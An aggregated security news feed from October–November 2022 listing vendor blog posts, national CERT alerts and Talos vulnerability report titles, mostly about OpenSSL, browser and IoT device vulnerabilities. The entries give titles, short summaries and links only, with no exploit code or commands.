https://www.corsa.com/2022/11/08/how-to-make-auto-scaling-a-reality-in-virtual-firewalls/
We sign code now
2022-11-08T12:30:15Z | 1667910615

Sigstore announced the general availability of its free and ecosystem-agnostic software signing service two weeks ago, giving developers a way to sign, verify and protect their software projects and the dependencies they rely on. Trail of Bits is absolutely thrilled to be a part of the project, and we spoke about our […]

https://blog.trailofbits.com/2022/11/08/sigstore-code-signing-verification-software-supply-chain/
Security Alert (A22-11-06): Multiple Vulnerabilities in Android
2022-11-08T04:00:00Z | 1667880000

Google has released Android Security Bulletin November 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Driving Into Action: Our New Partnership with the TAG Heuer Porsche Formula E Team
2022-11-07T17:30:00Z | 1667842200

In the new digital world, we’re no longer restricted by borders and can innovate with our colleagues and partners all over the world. ABB FIA Formula E World Championship has been growing year-on-year and has become the testing ground for the latest innovations not only for Motorsport, but the automotive industry as a whole. So,... The post Driving Into Action: Our New Partnership with the TAG Heuer Porsche Formula E Team appeared first on Cato Networks.

https://www.catonetworks.com/blog/porsche-official-sase-partner/
2022 Strategic Roadmap to SASE- with Gartner’s Neil Macdonald
2022-11-07T15:37:51Z | 1667835471

The post 2022 Strategic Roadmap to SASE- with Gartner’s Neil Macdonald appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-2022-strategic-roadmap-to-sase-webinar
An update on the impact of OpenSSL CVE-2022-3602 and CVE-2022-3786 on Akamai's systems
2022-11-07T10:00:00Z | 1667815200

In this post, we share the impact of the OpenSSL vulnerabilities CVE-2022-3602 and CVE-2022-3786 on Akamai and our customers.

https://www.akamai.com/blog/security/update-impact-openssl-cve-2022-3602-cve-2022-3786
Improve URL Redirects with EdgeWorkers and EdgeKV
2022-11-03T13:00:00Z | 1667480400

Use Akamai EdgeWorkers and Akamai EdgeKV to make intelligent redirect decisions.

https://www.akamai.com/blog/developers/improve-url-redirects-with-edgeworkers-and-edgekv
The OpenSSL Vulnerability: A Cato Networks Labs Update
2022-11-03T08:24:03Z | 1667463843

The new high severity vulnerabilities in OpenSSL — CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) – were disclosed this week. What is OpenSSL? OpenSSL is a popular open-source cryptography library that enables secured communications over the Internet in part through the generation of public/private keys and use of SSL and TLS protocols. What... The post The OpenSSL Vulnerability: A Cato Networks Labs Update appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-openssl-vulnerability-a-cato-networks-labs-update/
Security Alert (A22-11-05): Multiple Vulnerabilities in Cisco Products
2022-11-03T04:00:00Z | 1667448000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
How To Identify a Trusted Cloud Provider: The Essential Security Certifications and Practices You Should Look For
2022-11-02T15:22:33Z | 1667402553

Although managing on-premises servers may be costly and time-consuming, businesses at least have some control when it comes to patching say, a newly discovered exploit or stopping a zero-day attack. Not so with the cloud. Cloud-based estates are at the mercy of cloud service providers to apply relevant patches and maintain the security of the... The post How To Identify a Trusted Cloud Provider: The Essential Security Certifications and Practices You Should Look For appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-identify-a-trusted-cloud-provider/
Security Alert (A22-11-02): Multiple Vulnerabilities in Fortinet Products
2022-11-02T04:00:00Z | 1667361600

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-11-03): Multiple Vulnerabilities in OpenSSL
2022-11-02T04:00:00Z | 1667361600

OpenSSL has released 3.0.7 to fix the vulnerabilities in various versions of OpenSSL.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-11-04): Multiple Vulnerabilities in Synology DiskStation Manager
2022-11-02T04:00:00Z | 1667361600

Synology has published a security advisory to address multiple vulnerabilities in various versions of DiskStation Manager (DSM).

https://www.govcert.gov.hk/en/alerts_detail.php
Referencial de Educação para a Segurança, a Defesa e a Paz foi atualizado com temas na área da cibersegurança
2022-11-02T00:00:00Z | 1667347200

O Referencial de Educação Para a Segurança, a Defesa e a Paz foi atualizado e republicado e, com o apoio do CNCS, junta agora temas ligados à cibersegurança.Elaborado numa parceria entre a Direção-Geral da Educação (DGE), o Instituto da Defesa Nacional (IDN) e o Centro Nacional de Cibersegurança (CNCS), esta nova versão consiste numa atualização do Referencial editado em 2014, adaptada às mudanças decorrentes de uma crescente digitalização do mundo atual.O Referencial de Educação Para a Segurança, a Defesa e a Paz assenta no conjunto de princípios e condições que tornam as atividades da Segurança e da Defesa elementos essenciais no reforço da cidadania e da construção da Paz.Este documento, de natureza flexível, não prescritivo, é usado no âmbito da Educação para a Cidadania nas escolas nacionais, através do desenvolvimento de projetos e iniciativas que tenham como objetivo contribuir para a formação pessoal e social das crianças e dos jovens.Aceda ao Referencial aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135732/referencial-de-educacao-para-a-seguranca-a-defesa-e-a-paz-foi-atualizado-com-temas-na-area-da-ciberseguranca
SonicWall OpenSSL Version 3.x Security Advisory
2022-11-01T22:49:21Z | 1667342961

This advisory is intended to cover the following OpenSSL Vulnerabilities CVE-2022-3358 - Using a Custom Cipher with NID_undef may lead to NULL encryptionFixed in OpenSSL 3.0.6 (Affected OpenSSL Versions 3.x, 3.0.0-3.0.5).More vulnerability details are available here https://www.openssl.org/news/secadv/20221011.txtCVE-2022-3602 - X.509 Email Address 4-byte Buffer OverflowFixed in OpenSSL 3.0.7 (Affected OpenSSL Versions 3.x, 3.0.0-3.0.6).More vulnerability details are available here https://www.openssl.org/news/secadv/20221101.txtCVE-2022-3786 - X.509 Email Address Variable Length Buffer OverflowFixed in OpenSSL 3.0.7 (Affected OpenSSL Versions 3.x, 3.0.0-3.0.6).More vulnerability details are available here https://www.openssl.org/news/secadv/20221101.txt CVE: CVE-2022-3358, CVE-2022-3602 and CVE-2022-3786 Last updated: Nov. 1, 2022, 10:49 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0023
Solution Brief - A “whole-of-state” approach to cybersecurity
2022-11-01T19:42:05Z | 1667331725

A “whole-of-state” approach to cybersecurity – a strategy that enables a collective approach to counter adversaries as they increase attacks such as ransomware-as-a-service – serves as a framework for state-wide cybersecurity, leveraging every agency, municipality, public utilities, and cooperative stakeholders to defend as one versus in silos.

https://www.ironnet.com/resource-library/solution-brief-a-whole-of-state-approach-to-cybersecurity
UPDATE: Patch OpenSSL available, vulnerability scaled down
2022-11-01T17:20:00Z | 1667323200

The OpenSSL development team has just released version 3.0.7. In it, several vulnerabilities are fixed. The vulnerability that OpenSSL previously classified as ‘critical’, is now scaled down to ‘high’. Based on the information now available, the NCSC also estimates the severity of the vulnerability to be less than previously thought.

https://english.ncsc.nl/latest/news/2022/november/01/update-patch-openssl-available-vulnerability-scaled-down
The National Cyber Security Centre Finland’s weekly review – 43/2022
2022-11-01T14:29:49Z | 1667312989

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 21–27 October 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-432022
The National Cyber Security Centre Finland’s weekly review – 43/2022
2022-11-01T14:29:49Z | 1667312989

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 21–27 October 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-432022
High Threat Security Alert (A22-11-01): Vulnerability in Microsoft Edge
2022-11-01T04:00:00Z | 1667275200

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Vulnerability in OpenSSL: prepare for updates
2022-10-31T15:40:00Z | 1667230800

A critical vulnerability has been found in OpenSSL 3.0. The OpenSSL development team has announced that they will release version 3.0.7 on Tuesday, Nov. 1, 2022. This new version will fix the vulnerability. The vulnerability is not present in versions lower than 3.0. Versions 1.1.1 and 1.0.2 are therefore not affected by this problem.

https://english.ncsc.nl/latest/news/2022/october/31/vulnerability-in-openssl-prepare-for-updates
DNS Threat Report ? Q3 2022
2022-10-31T14:00:00Z | 1667224800

Akamai's visibility into global traffic through Q3 provides insight into phishing campaigns and potential user susceptibility to malware attacks.

https://www.akamai.com/blog/security-research/dns-threat-report-q3-2022
If You Want a True Security Platform, You Need SASE
2022-10-31T12:22:29Z | 1667218949

The cybersecurity industry is well known for its buzzwords. Every year, a new word, phrase, or acronym emerges to describe the latest and greatest tool that is absolutely essential to an organization’s ability to protect itself against cyber threats. Recently, the focus has been on ‘security platforms’, which are intended to simplify security architectures by... The post If You Want a True Security Platform, You Need SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/if-you-want-a-true-security-platform-you-need-sase/
Effectively Preparing for the OpenSSL 3.x Vulnerability
2022-10-31T09:00:27Z | 1667206827

With all the noise about the OpenSSL vulnerability, see this blog about how to prepare for mitigation when the patch is released.

https://www.akamai.com/blog/security-research/openssl-vulnerability-how-to-effectively-prepare
Better A/B Testing with EdgeWorkers + EdgeKV
2022-10-28T13:00:00Z | 1666962000

Learn how to use Akamai EdgeWorkers and EdgeKV to create easy-to-control A/B tests.

https://www.akamai.com/blog/developers/better-a-b-testing-with-edgeworkes-edgekv
High Threat Security Alert (A22-10-22): Vulnerability in Google Chrome
2022-10-28T04:00:00Z | 1666929600

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-23): Multiple Vulnerabilities in Microsoft Edge
2022-10-28T04:00:00Z | 1666929600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
C-Academy - Formação Avançada em Cibersegurança lança calendário de formações
2022-10-28T00:00:00Z | 1666915200

No âmbito da Conferência C-DAYS Açores, foi apresentada a primeira calendarização da oferta formativa referente à C-Academy - Formação Avançada em Cibersegurança, do Centro Nacional de Cibersegurança.  Recorde-se que, a C-Academy disponibilizará sensivelmente 44 cursos, com turmas entre os 15 e os 40 elementos, com diferentes níveis de exigência e num formato on-line, presencial ou misto. Até ao momento, já se encontram calendarizadas ações de formação relativas a 18 destes 44 cursos, encontrando-se já agendadas ações de formação para dezembro deste ano.O calendário com a oferta formativa pode ser consultado aqui .

https://dyn.cncs.gov.pt/pt/detalhe/art/135730/c-academy-formacao-avancada-em-ciberseguranca-lanca-calendario-de-formacoes
User-Agent Reduction
2022-10-27T16:00:00Z | 1666886400

Chrome is rolling out changes to the browser?s User-Agent string that will affect how web servers, applications, and CDNs like Akamai gather information about the current user agent (such as the browser?s version, device, and platform information).

https://www.akamai.com/blog/developers/user-agent-reduction
SASE, SSE, ZTNA, SD-WAN: Your Journey, Your Way
2022-10-27T13:57:16Z | 1666879036

Organizations are in the midst of an exciting period of transformational change. Legacy IT architectures and operational models that served enterprises over the past three decades are being re-evaluated. IT organizations are now driven by the need for speed, agility, and supporting the business in a fiercely competitive environment.    What kind of transformation is needed... The post SASE, SSE, ZTNA, SD-WAN: Your Journey, Your Way appeared first on Cato Networks.

https://www.catonetworks.com/blog/your-journey-your-way/
Instruction on recording information on traffic data processing enters into force on 27 October 2022
2022-10-27T13:20:29Z | 1666876829

This instruction applies to the recording and storing of event information related to the processing of traffic data, to which Section 145 of the Act on Electronic Communications Services (917/2014) applies. The instruction applies to all communications providers. The instruction replaces Finnish Communications Regulatory Authority (FICORA) Recommendation 308/2004 published in 2004.

https://www.kyberturvallisuuskeskus.fi/en/news/instruction-recording-information-traffic-data-processing-enters-force-27-october-2022
Instruction on recording information on traffic data processing enters into force on 27 October 2022
2022-10-27T13:20:29Z | 1666876829

This instruction applies to the recording and storing of event information related to the processing of traffic data, to which Section 145 of the Act on Electronic Communications Services (917/2014) applies. The instruction applies to all communications providers. The instruction replaces Finnish Communications Regulatory Authority (FICORA) Recommendation 308/2004 published in 2004.

https://www.kyberturvallisuuskeskus.fi/en/news/instruction-recording-information-traffic-data-processing-enters-force-27-october-2022
Finnish News Agency STT recognised as Information Security Trailblazer – open sharing of information supports preparedness for cyber threats
2022-10-27T07:01:01Z | 1666854061

The Finnish Transport and Communications Agency Traficom has granted its Information Security Trailblazer award to the Finnish News Agency STT. STT was praised for its open communication after falling victim to a cyberattack in the summer of 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/finnish-news-agency-stt-recognised-information-security-trailblazer-open-sharing-information
Finnish News Agency STT recognised as Information Security Trailblazer – open sharing of information supports preparedness for cyber threats
2022-10-27T07:01:01Z | 1666854061

The Finnish Transport and Communications Agency Traficom has granted its Information Security Trailblazer award to the Finnish News Agency STT. STT was praised for its open communication after falling victim to a cyberattack in the summer of 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/finnish-news-agency-stt-recognised-information-security-trailblazer-open-sharing-information
InHand Networks InRouter302 console nvram leftover debug code vulnerability
2022-10-27T00:00:00Z | 1666828800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1518
InHand Networks InRouter302 console verify leftover debug code vulnerability
2022-10-27T00:00:00Z | 1666828800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1520
InHand Networks InRouter302 console infct leftover debug code vulnerability
2022-10-27T00:00:00Z | 1666828800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1519
InHand Networks InRouter302 console support leftover debug code vulnerability
2022-10-27T00:00:00Z | 1666828800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1521
InHand Networks InRouter302 Incorrect fixes privilege escalation vulnerability
2022-10-27T00:00:00Z | 1666828800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1523
Accusoft ImageGear PICT parsing pctwread_14841 out-of-bounds write vulnerability
2022-10-27T00:00:00Z | 1666828800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1544
InHand Networks InRouter302 httpd port 4444 upload.cgi leftover debug code vulnerability
2022-10-27T00:00:00Z | 1666828800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1522
ICANN was a massive success in getting the word out about DNS Abuse and FIRST
2022-10-27T00:00:00Z | 1666828800

In September, ICANN invited me to talk about DNS Abuse at the ICANN75 AGM in Kuala Lumpur, Malaysia. It was a great success! My presentation ‘The Challenge of Defining DNS Abuse’ was well received, and many attending industry specialists asked good questions, especially about FIRST's work. I made many valuable connections, including people from ICANN, the DNS Abuse Institute, registries, registrars, CERTs, commercial companies, government organizations, and many more.

https://www.first.org/blog/20221027_ICANN_was_a_massive_success_in_getting_the_word_out_about_DNS_Abuse_and_FIRST
ICANN was a massive success in getting the word out about DNS Abuse and FIRST
2022-10-27T00:00:00Z | 1666828800

In September, ICANN invited me to talk about DNS Abuse at the ICANN75 AGM in Kuala Lumpur, Malaysia. It was a great success! My presentation ‘The Challenge of Defining DNS Abuse’ was well received, and many attending industry specialists asked good questions, especially about FIRST's work. I made many valuable connections, including people from ICANN, the DNS Abuse Institute, registries, registrars, CERTs, commercial companies, government organizations, and many more.

https://www.first.org/blog/20221027_ICANN_was_a_massive_success_in_getting_the_word_out_about_DNS_Abuse_and_FIRST
Inside a Network Outage: How Cato SASE Cloud Overcame Last Week’s Fiber Optic Cable Cut
2022-10-26T14:52:21Z | 1666795941

Last week, once again the industry saw the importance of building your enterprise network on a global private backbone not just the public Internet. On Monday night, a major fiber optic cable was severed in the Bouches-du-Rhône region of France. The cut impacted the Internet worldwide. Instantly, packet loss surged to 100 percent on select... The post Inside a Network Outage: How Cato SASE Cloud Overcame Last Week’s Fiber Optic Cable Cut appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-cato-sase-cloud-overcame-last-weeks-fiber-optic-cable-cut/
The National Cyber Security Centre Finland’s weekly review – 42/2022
2022-10-26T13:33:41Z | 1666791221

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 14–20 October 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-422022
The National Cyber Security Centre Finland’s weekly review – 42/2022
2022-10-26T13:33:41Z | 1666791221

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 14–20 October 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-422022
dhpcd: The Cryptominer That Hid for Four Years
2022-10-26T13:00:00Z | 1666789200

Akamai Researchers have uncovered a long-running attack campaign attack targeting Linux SSH servers that has been running a monero cryptominer.

https://www.akamai.com/blog/security-research/dhpcd-cryptominer-hid-four-years
High Threat Security Alert (A22-10-20): Multiple Vulnerabilities in VMware Cloud Foundation
2022-10-26T04:00:00Z | 1666756800

VMware has published a security advisory to address multiple vulnerabilities in VMware Cloud Foundation.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-21): Multiple Vulnerabilities in Google Chrome
2022-10-26T04:00:00Z | 1666756800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai?s Prolexic Launches Sixth-Generation DDoS Platform Upgrade
2022-10-25T13:00:00Z | 1666702800

Today, we are excited to announce a significant evolution of Akamai?s distributed denial-of-service (DDoS) protection solution, Prolexic.

https://www.akamai.com/blog/news/akamais-prolexic-launches-sixth-generation-ddos-platform-upgrade
Stranger Strings: An exploitable flaw in SQLite
2022-10-25T11:30:10Z | 1666697410

Trail of Bits is publicly disclosing CVE-2022-35737, which affects applications that use the SQLite library API. CVE-2022-35737 was introduced in SQLite version 1.0.12 (released on October 17, 2000) and fixed in release 3.39.2 (released on July 21, 2022). CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is […]

https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/
Why Application Awareness is Essential for Firewall Security
2022-10-25T09:12:31Z | 1666689151

Firewalls – the foundation of an organization’s network security strategy – filters network traffic and can enforce an organization’s security rules. By limiting the traffic that enters and leaves or enters an organization’s network, a firewall can dramatically reduce its vulnerability to data breaches and other cyberattacks. However, a firewall is only effective if it... The post Why Application Awareness is Essential for Firewall Security  appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-application-awareness-is-essential-for-firewall-security/
High Threat Security Alert (A22-10-19): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-10-25T04:00:00Z | 1666670400

Apple has released iOS 15.7.1, iOS 16.1, iPadOS 15.7.1 and iPadOS 16 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Getting It Done: It?s Go Time for Bold Leadership in Sustainability
2022-10-24T13:00:00Z | 1666616400

Sustainability professionals from around the world convened in New York City for Climate Week NYC 2022, exploring the theme of the week to ?get it done.?

https://www.akamai.com/blog/sustainability/its-go-time-for-bold-leadership-in-sustainability
What?s New for Developers: October 2022
2022-10-24T13:00:00Z | 1666616400

Read about our new Postman collections, the latest Akamai PowerShell release, our improvements to Edge Diagnostics, and how to quickly integrate Linode with Akamai.

https://www.akamai.com/blog/developers/whats-new-for-developers-october-2022
How to Adopt SASE in 6 Easy Steps
2022-10-24T12:55:33Z | 1666616133

The post How to Adopt SASE in 6 Easy Steps appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-adopt-sase-in-6-easy-steps/
FIRST POST: October - December 2022
2022-10-24T00:00:00Z | 1666569600

Traffic Light Protocol Version 2.0 is Now Available; FIRST delivers training in Uganda, and the Western Balkans; Peter Lowe speaks about DNS Abuse at ICANN75 AGM in Kuala Lumpur; FIRST Chair Sherif Hashem participates in the Cyber Diplomacy and Norms panel at The Second Community of African Cyber Experts; The World Opens - FIRST Events Round Up; Special Interest Groups Update and New NETSEC SIG Formed; The Board meets in Davos; Board of Directors Organization and Roles for 2022/23; Twenty new members join FIRST

https://www.first.org/newsroom/newsletters/FIRST_POST_oct_dec_2022.pdf
CVE-2022-42889 Text4shell Apache Commons Text RCE Vulnerability
2022-10-21T19:14:43Z | 1666379683

This advisory will cover the CVE-2022-42889 - Text4shell Apache Commons Text RCE Vulnerability. SonicWall Product (Appliance/Cloud/Virtual/OnPrem) Status Description Email Security- Hosted Email Security (HES)- On-Premise Email Security  Not Impacted N/A NSM- NSM SaaS          - NSM On-Premise TBD Under Investigation WAF Not Impacted N/A Gen5 Firewalls (EOS)- TZ100/W- TZ200/W- TZ210/W- NSA 220/W- NSA 250M/250M-W- NSA 2400/MX/3500/4500/5500- NSA E5500/6500/6500/8500/8510 Not Impacted N/A Gen6 Firewalls- TZ300/W; TZ350/W- TZ400/W- TZ500/W- TZ600- NSA 2600/2650/3600/3650/4600/4650/5600/5650/6600/6650- SM 9200/9400/9600/9800- NSa 9250/9450/9650- NSSP 12400/12800- NSV 10/25/50/100/200/400/800/1600 (ESX, KVM, HYPER-V, AWS, Azure) Not Impacted N/A Gen7 Firewalls- TZ270/W- TZ370/W- TZ470/W- TZ570/W- TZ670- NSA 2700/3700/4700/5700/6700- NSSP 10700/11700/13700/15700- NSV 270/470/870 (ESX, KVM, HYPER-V, AWS, Azure) Not Impacted N/A SonicWall Switch- SWS 12-8/12-8POE- SWS 12-10FPOE- SWS 14-24/14-24FPOE- SWS 14-48/14-48FPOE Not Impacted N/A SMA 100- SMA 200/210/400/410- SMA 500v (ESX, KVM, Hyper-V, AWS, Azure) Not Impacted N/A SMA 1000- SMA 6200/7200/6210/7210- SMA 8200v (ESX, KVM, Hyper-V, AWS, Azure)- SRA EX 7000  Not Impacted N/A MSW  Not Impacted N/A Analyzer TBD Under Investigation GMS TBD Under Investigation Capture Client & Capture Client Portal Not Impacted N/A CAS Not Impacted N/A Access Points  Not Impacted N/A WNM Not Impacted N/A Capture Security Appliance  Not Impacted N/A WXA- WXA 2000/4000- Virtual: WXA 5000- Software: WXA 500, WXA 6000 Not Impacted N/A CSCMA TBDUnder Investigation EPRS Not Impacted N/A Cloud Edge Not Impacted N/A Analytics TBD Under Investigation CVE: CVE-2022-42889 Last updated: Oct. 21, 2022, 7:14 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0022
Secure Internet Access Is Needed Everywhere
2022-10-21T13:00:00Z | 1666357200

Internet threats have made businesses (and people) vulnerable. Learn how to maintain effective security against cyberthreats with Secure Internet Access.

https://www.akamai.com/blog/security/secure-internet-access-needed-everywhere
NCSC CEO delivers international speech on securing the Internet of Things and smart cities
2022-10-20T13:34:28Z | 1666272868

Lindy Cameron outlined how the ‘secure by design’ approach is vital for managing IoT risks at Singapore International Cyber Week.

https://www.ncsc.gov.uk/news/ncsc-ceo-delivers-international-speech-on-securing-the-internet-of-things-and-smart-cities
Securing Applications in a Multicloud World
2022-10-20T13:00:00Z | 1666270800

Widespread adoption of multicloud architecture presents challenges in securing applications. Learn about the benefits of deploying security controls on the edge.

https://www.akamai.com/blog/cloud/securing-applications-in-a-multicloud-world
Corsa Security Drives Forward with Additional $10 Million Funding
2022-10-20T12:00:00Z | 1666267200

Latest Investment to Broaden Integrations with Top Firewall Vendors Corsa Security, leaders in scaling network security, announced today it has secured an additional $10 million in funding from Roadmap Capital. The funds will be used to propel product development of the Corsa Security Orchestrator (CSO) with industry leading features and to engage in key customer […] The post Corsa Security Drives Forward with Additional $10 Million Funding appeared first on Corsa Security.

https://www.corsa.com/2022/10/20/corsa-security-drives-forward-with-additional-10-million-funding/
Security Alert (A22-10-18): Multiple Vulnerabilities in Cisco Products
2022-10-20T04:00:00Z | 1666238400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Abode Systems, Inc. iota All-In-One Security Kit web interface /action/ipcamRecordPost OS command injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1563
Abode Systems, Inc. iota All-In-One Security Kit UPnP logging format string injection vulnerabilities
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1583
Abode Systems, Inc. iota All-In-One Security Kit telnet hard-coded password vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1569
Abode Systems, Inc. iota All-In-One Security Kit web interface /action/wirelessConnect format string injection vulnerabilities
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1585
Abode Systems, Inc. iota All-In-One Security Kit XCMD setUPnP OS command injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1557
Abode Systems, Inc. iota All-In-One Security Kit ghome_process_control_packet format string injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1584
Abode Systems, Inc. iota All-In-One Security Kit web interface /action/ipcamSetParamPost double-free vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1565
Abode Systems, Inc. iota All-In-One Security Kit XCMD doDebug denial of service vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1555
Abode Systems, Inc. iota All-In-One Security Kit web interface /action/ipcamRecordPost integer overflow vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1564
Abode Systems, Inc. iota All-In-One Security Kit web interface /action/wirelessConnect OS command injection vulnerabilities
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1568
Abode Systems, Inc. iota All-In-One Security Kit web interface util_set_serial_mac OS command injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1566
Abode Systems, Inc. iota All-In-One Security Kit console_main_loop :sys OS command injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1561
Abode Systems, Inc. iota All-In-One Security Kit XCMD setIPCam stack-based buffer overflow vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1560
Abode Systems, Inc. iota All-In-One Security Kit XCMD testWifiAP OS command injection vulnerabilities
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1559
Abode Systems, Inc. iota All-In-One Security Kit XCMD setAlexa OS command injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1558
Abode Systems, Inc. iota All-In-One Security Kit GHOME control authentication bypass vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1552
Abode Systems, Inc. iota All-In-One Security Kit XCMD getVarHA memory corruption vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1582
Abode Systems, Inc. iota All-In-One Security Kit XCMD testWifiAP format string injection vulnerabilities
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1581
Abode Systems, Inc. iota All-In-One Security Kit web interface /action/factory* authentication bypass vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1554
Abode Systems, Inc. iota All-In-One Security Kit web interface util_set_abode_code OS command injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1567
Abode Systems, Inc. iota All-In-One Security Kit XFINDER information disclosure vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1553
Abode Systems, Inc. iota All-In-One Security Kit XCMD doDebug OS Command Injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1556
Abode Systems, Inc. iota All-In-One Security Kit web interface /action/iperf OS command injection vulnerability
2022-10-20T00:00:00Z | 1666224000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1562
Who?s Scanning the IPv6 Space? And, Frankly, Why Do We Even Care?
2022-10-19T13:00:00Z | 1666184400

Securing IPv6 is no longer optional, it's a necessity. In this first of its kind empirical study on the vulnerability scanning landscape of IPv6, you'll learn the challenges and differences between IPv6 and IPv4 to be better prepared for the future.

https://www.akamai.com/blog/security-research/vulnerability-scanning-IPv6-why-should-we-care
The National Cyber Security Centre Finland’s weekly review – 41/2022
2022-10-19T08:55:13Z | 1666169713

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 7–13 October 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-412022
The National Cyber Security Centre Finland’s weekly review – 41/2022
2022-10-19T08:55:13Z | 1666169713

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 7–13 October 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-412022
Security Alert (A22-10-16): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2022)
2022-10-19T04:00:00Z | 1666152000

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-17): Multiple Vulnerabilities in Firefox
2022-10-19T04:00:00Z | 1666152000

